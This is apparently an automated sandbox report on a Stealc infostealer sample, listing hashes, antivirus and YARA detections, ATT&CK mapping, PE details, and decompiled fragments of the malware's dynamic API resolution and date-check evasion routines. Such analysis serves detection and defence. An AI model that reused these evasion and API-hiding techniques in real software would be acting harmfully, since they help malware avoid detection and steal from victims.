Edit tour

Windows Analysis Report
stealc.bin.exe

Overview

General Information

Sample Name:	stealc.bin.exe
Analysis ID:	812492
MD5:	0d049f764a22e16933f8c3f1704d4e50
SHA1:	5faad57c7341f76c18ae813e9fa9fbfe434f7b41
SHA256:	77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d
Tags:	exeStealc
Infos:

Detection

Stealc

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Stealc

Found evasive API chain (may stop execution after checking locale)

PE file has a writeable .text section

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Found evasive API chain (date check)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

stealc.bin.exe (PID: 5836 cmdline: C:\Users\user\Desktop\stealc.bin.exe MD5: 0D049F764A22E16933F8C3F1704D4E50)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc		No Attribution	https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
stealc.bin.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: stealc.bin.exe PID: 5836	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.stealc.bin.exe.170000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.0.stealc.bin.exe.170000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Joe Sandbox Signatures

• AV Detection
• Cryptography
• Compliance
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: stealc.bin.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: stealc.bin.exe	ReversingLabs: Detection: 61%
Source: stealc.bin.exe	Virustotal: Detection: 74%			Perma Link

Machine Learning detection for sample

Source: stealc.bin.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\stealc.bin.exe	Code function: 2_2_00174C21 CryptStringToBinaryA,CryptStringToBinaryA,		2_2_00174C21
Source: C:\Users\user\Desktop\stealc.bin.exe	Code function: 2_2_001767F3 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,		2_2_001767F3

Source: stealc.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: stealc.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: stealc.bin.exe, 00000002.00000002.284195778.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

PE file has a writeable .text section

Source: stealc.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: stealc.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: String function: 00173083 appears 326 times

Source: stealc.bin.exe	ReversingLabs: Detection: 61%
Source: stealc.bin.exe	Virustotal: Detection: 74%

Source: stealc.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\stealc.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winEXE@1/0@0/0

Source: stealc.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_0017DD84 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0017DD84

Source: C:\Users\user\Desktop\stealc.bin.exe

2_2_0017DD84

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\stealc.bin.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_2-6995

Source: C:\Users\user\Desktop\stealc.bin.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_2-8734

Source: C:\Users\user\Desktop\stealc.bin.exe

API coverage: 7.9 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_001792E7 GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetSystemInfo,GetProcessHeap,RtlAllocateHeap,GlobalMemoryStatusEx,GetProcessHeap,RtlAllocateHeap,lstrlen,

2_2_001792E7

Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-7953
Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-6987
Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-6994
Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-6981
Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-6996
Source: C:\Users\user\Desktop\stealc.bin.exe	API call chain: ExitProcess graph end node	graph_2-7005

Source: stealc.bin.exe, 00000002.00000002.284217048.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: VMwareVMware

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_0017DD84 mov eax, dword ptr fs:[00000030h]

2_2_0017DD84

Source: C:\Users\user\Desktop\stealc.bin.exe

2_2_0017DD84

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_0017D193 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_0017D193

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_0017CECA GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

2_2_0017CECA

Source: C:\Users\user\Desktop\stealc.bin.exe

Code function: 2_2_0017D193 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_0017D193

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: stealc.bin.exe, type: SAMPLE
Source: Yara match	File source: 2.2.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc.bin.exe PID: 5836, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: stealc.bin.exe, type: SAMPLE
Source: Yara match	File source: 2.2.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.stealc.bin.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc.bin.exe PID: 5836, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	Path Interception	Path Interception	1 Virtualization/Sandbox Evasion	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
stealc.bin.exe	62%	ReversingLabs	Win32.Ransomware.Locky
stealc.bin.exe	75%	Virustotal		Browse
stealc.bin.exe	100%	Avira	TR/Crypt.XPACK.Gen
stealc.bin.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.0.stealc.bin.exe.170000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
2.2.stealc.bin.exe.170000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	812492
Start date and time:	2023-02-21 11:29:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	stealc.bin.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 79.1%) Quality average: 57.3% Quality standard deviation: 37%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.164204671416999
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	stealc.bin.exe
File size:	81408
MD5:	0d049f764a22e16933f8c3f1704d4e50
SHA1:	5faad57c7341f76c18ae813e9fa9fbfe434f7b41
SHA256:	77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d
SHA512:	a6e2f5e873c76e31cbd4bd1d1e47f59ff93b2c7b9a0be804bccd5fce700377b2ed94cac6f275d6c2efa38b74875e50a11bbe9c9eeca3de09d6d4b7c06c2bc884
SSDEEP:	1536:yYsVdxtfVnAo5lg/qrZ7B2QVu0BZFQLtqhG6ha4kUYXKl2WK:yYsPPAo5lg/A/2dYZFQLUG6hTy
TLSH:	B583E729E672A2F7C851C5BC31095AD6A23A4975305EE483FFA45F82BDF00825DC8F97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x&..<G..<G..<G..S1Y.>G..5?D.?G..5?T.>G...>..?G..<G..;G..S1h.1G..S1Z.=G..Rich<G..........................PE..L....A.c...........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x40cf89
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63D541B8 [Sat Jan 28 15:39:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3ea275f08a220b994925af0527312bae

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
je 00007F36C905FF85h
jne 00007F36C905FF83h
mov eax, FF4973E8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+000DDEE8h], edi
add byte ptr [eax-27h], ch
sti
inc eax
add byte ptr [ebp-22170B8Bh], cl
sbb dword ptr [eax], eax
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-00BFAC18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00BF0518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00BED318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00020A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00BF5318h], edi
jmp far eax
test eax, 50000001h
mov esi, 00411EC0h
push esi
call 00007F36C9060154h
push eax
push esi
push dword ptr [00613454h]
lea esi, dword ptr [ebp-48h]
lea eax, dword ptr [ebp-0Ch]
call 00007F36C9061A27h
lea esi, dword ptr [ebp-3Ch]
call 00007F36C9061A1Fh
lea esi, dword ptr [ebp-30h]
call 00007F36C9061A17h
lea esi, dword ptr [ebp-24h]
call 00007F36C9061A0Fh
lea esi, dword ptr [ebp-18h]
call 00007F36C9061A07h
lea esi, dword ptr [ebp-0Ch]
call 00007F36C9061983h
mov eax, dword ptr [ebp-18h]
call 00007F36C9054785h
mov eax, dword ptr [ebp-24h]
call 00007F36C905477Dh
mov eax, dword ptr [ebp-30h]
call 00007F36C9054775h
mov eax, dword ptr [ebp-3Ch]
call 00007F36C905476Dh

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1203c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x225000	0x1430	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdc22	0xde00	False	0.47379997184684686	data	6.102096193160668	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x30ca	0x3200	False	0.413515625	data	5.568635274136313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x2111c7	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x225000	0x29b8	0x2a00	False	0.41052827380952384	data	4.205852868774967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
msvcrt.dll	atexit, memset, strtok_s, memcpy, malloc, memcmp

Network Behavior

Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

Statistics

CPU Usage

• stealc.bin.exe

Click to jump to process

Memory Usage

• stealc.bin.exe

Click to jump to process

System Behavior

Analysis Process: stealc.bin.exePID: 5836, Parent PID: 3324

Function Logs

General

Target ID:	2
Start time:	11:29:57
Start date:	21/02/2023
Path:	C:\Users\user\Desktop\stealc.bin.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\stealc.bin.exe
Imagebase:	0x170000
File size:	81408 bytes
MD5 hash:	0D049F764A22E16933F8C3F1704D4E50
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000000.283699415.000000000017F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

File Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Value Queried

Show Windows behavior

Process Activities

Process Queried

Process Terminated

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Allocated

Show Windows behavior

System Activities

System Information Queried

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

Analysis Process: stealc.bin.exePID: 5836, Parent PID: 3324COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	13

Executed Functions

Function 0017DD84 Relevance: 46.7, APIs: 31, Instructions: 159
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0017DD84(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				_Unknown_base(*)()* _t24;
				intOrPtr* _t30;
				struct HINSTANCE__* _t54;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_t54 = _v8;
				 *0x383768 = _t54;
				if(_t54 != 0) {
					_t30 = E0017DCF5(__ecx);
					 *0x3836b0 = _t30;
					 *0x3835e8 =  *_t30(_t54,  *0x383150);
					 *0x383730 = GetProcAddress( *0x383768,  *0x3834d0);
					 *0x3835dc = GetProcAddress( *0x383768,  *0x383534);
					 *0x383724 = GetProcAddress( *0x383768,  *0x3831a8);
					 *0x383604 = GetProcAddress( *0x383768,  *0x383194);
					 *0x3835e4 = GetProcAddress( *0x383768,  *0x383234);
					 *0x38376c = GetProcAddress( *0x383768,  *0x3833ec);
					 *0x383758 = GetProcAddress( *0x383768,  *0x383278);
					 *0x38363c = GetProcAddress( *0x383768,  *0x3834b8);
					 *0x38364c = GetProcAddress( *0x383768,  *0x38345c);
					 *0x3836ec = GetProcAddress( *0x383768,  *0x3832ec);
					 *0x383720 = GetProcAddress( *0x383768,  *0x383228);
					 *0x383714 = GetProcAddress( *0x383768,  *0x383500);
					 *0x3837b8 = GetProcAddress( *0x383768,  *0x383018);
					 *0x38377c = GetProcAddress( *0x383768,  *0x3834b0);
					 *0x383794 = GetProcAddress( *0x383768,  *0x38316c);
					 *0x383658 = GetProcAddress( *0x383768,  *0x383344);
					 *0x3836bc = GetProcAddress( *0x383768,  *0x383524);
					 *0x3837bc = GetProcAddress( *0x383768,  *0x383024);
					 *0x3836dc = GetProcAddress( *0x383768,  *0x383080);
					 *0x3836e4 = GetProcAddress( *0x383768,  *0x3831f4);
				}
				_t14 = LoadLibraryA( *0x383464); // executed
				 *0x3835b8 = _t14; // executed
				_t15 = LoadLibraryA( *0x3830cc); // executed
				 *0x3836c0 = _t15;
				 *0x38379c = LoadLibraryA( *0x383058); // executed
				_t17 = LoadLibraryA( *0x38312c); // executed
				 *0x38367c = _t17;
				 *0x3836a4 = LoadLibraryA( *0x383264);
				_t19 =  *0x3835b8; // 0x76170000
				if(_t19 != 0) {
					 *0x383688 = GetProcAddress(_t19,  *0x3833cc);
				}
				_t20 =  *0x3836c0; // 0x76130000
				if(_t20 != 0) {
					 *0x3836f4 = GetProcAddress(_t20,  *0x383350);
					 *0x3836a0 = GetProcAddress( *0x3836c0,  *0x38311c);
				}
				_t21 =  *0x38379c; // 0x762b0000
				if(_t21 != 0) {
					 *0x383734 = GetProcAddress(_t21,  *0x3832cc);
				}
				_t22 =  *0x38367c; // 0x76b00000
				if(_t22 != 0) {
					 *0x383700 = GetProcAddress(_t22,  *0x38307c);
				}
				_t23 =  *0x3836a4; // 0x77090000
				if(_t23 != 0) {
					_t24 = GetProcAddress(_t23,  *0x383340);
					 *0x38375c = _t24;
					return _t24;
				}
				return _t23;
			}

0x0017dd87
0x0017dd88
0x0017dda0
0x0017dda3
0x0017dda6
0x0017ddae
0x0017ddb4
0x0017ddbf
0x0017ddcd
0x0017dde4
0x0017ddfb
0x0017de12
0x0017de29
0x0017de40
0x0017de57
0x0017de6e
0x0017de85
0x0017de9c
0x0017deb3
0x0017deca
0x0017dee1
0x0017def8
0x0017df0f
0x0017df26
0x0017df3d
0x0017df54
0x0017df6b
0x0017df82
0x0017df93
0x0017df93
0x0017df9e
0x0017dfaa
0x0017dfaf
0x0017dfbb
0x0017dfcc
0x0017dfd1
0x0017dfdd
0x0017dfe8
0x0017dfed
0x0017dff5
0x0017e004
0x0017e004
0x0017e009
0x0017e010
0x0017e025
0x0017e036
0x0017e036
0x0017e03b
0x0017e042
0x0017e051
0x0017e051
0x0017e056
0x0017e05d
0x0017e06c
0x0017e06c
0x0017e071
0x0017e078
0x0017e081
0x0017e087
0x00000000
0x0017e087
0x0017e08d

APIs

GetProcAddress.KERNEL32 ref: 0017DDD8
GetProcAddress.KERNEL32 ref: 0017DDEF
GetProcAddress.KERNEL32 ref: 0017DE06
GetProcAddress.KERNEL32 ref: 0017DE1D
GetProcAddress.KERNEL32 ref: 0017DE34
GetProcAddress.KERNEL32 ref: 0017DE4B
GetProcAddress.KERNEL32 ref: 0017DE62
GetProcAddress.KERNEL32 ref: 0017DE79
GetProcAddress.KERNEL32 ref: 0017DE90
GetProcAddress.KERNEL32 ref: 0017DEA7
GetProcAddress.KERNEL32 ref: 0017DEBE
GetProcAddress.KERNEL32 ref: 0017DED5
GetProcAddress.KERNEL32 ref: 0017DEEC
GetProcAddress.KERNEL32 ref: 0017DF03
GetProcAddress.KERNEL32 ref: 0017DF1A
GetProcAddress.KERNEL32 ref: 0017DF31
GetProcAddress.KERNEL32 ref: 0017DF48
GetProcAddress.KERNEL32 ref: 0017DF5F
GetProcAddress.KERNEL32 ref: 0017DF76
GetProcAddress.KERNEL32 ref: 0017DF8D
LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DF9E
LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DFAF
LoadLibraryA.KERNEL32(?,?,?,0017CFA6), ref: 0017DFC0
LoadLibraryA.KERNELBASE(?,?,?,0017CFA6), ref: 0017DFD1
LoadLibraryA.KERNEL32(?,?,?,0017CFA6), ref: 0017DFE2
GetProcAddress.KERNEL32(76170000), ref: 0017DFFE
GetProcAddress.KERNEL32(76130000), ref: 0017E019
GetProcAddress.KERNEL32 ref: 0017E030
GetProcAddress.KERNEL32(762B0000), ref: 0017E04B
GetProcAddress.KERNEL32(76B00000), ref: 0017E066
GetProcAddress.KERNEL32(77090000), ref: 0017E081

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 9f2be59a9821026dc398929a53c72275b06c283dff97f49eb16163e8843405df
Instruction ID: fe385aa6feccf698f1cb877fddd1bd9490a8e252c691d1d6d3db4959128c92c8
Opcode Fuzzy Hash: 9f2be59a9821026dc398929a53c72275b06c283dff97f49eb16163e8843405df
Instruction Fuzzy Hash: 2681D2B5941340BFEB039F69ED989257FAEFB09F01B0451A9E90592330E7328A65EF10

Uniqueness

Uniqueness Score: -1.00%

Function 0017CECA Relevance: 7.6, APIs: 5, Instructions: 66
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E0017CECA() {
				void* _v18;
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				char _v48;
				struct _FILETIME _v60;
				struct _FILETIME _v68;
				void* __edi;
				long _t39;
				void* _t54;

				_v20.wYear = 0;
				_v68.dwLowDateTime = _v68.dwLowDateTime & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v36.wYear = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v60.dwLowDateTime = _v60.dwLowDateTime & 0;
				asm("stosd");
				asm("stosd");
				GetSystemTime( &_v20);
				sscanf( *(E0017CDFB( &_v48)),  *0x383330,  &(_v36.wDay),  &(_v36.wMonth),  &_v36);
				E00171839(_v48);
				SystemTimeToFileTime( &_v20,  &_v68);
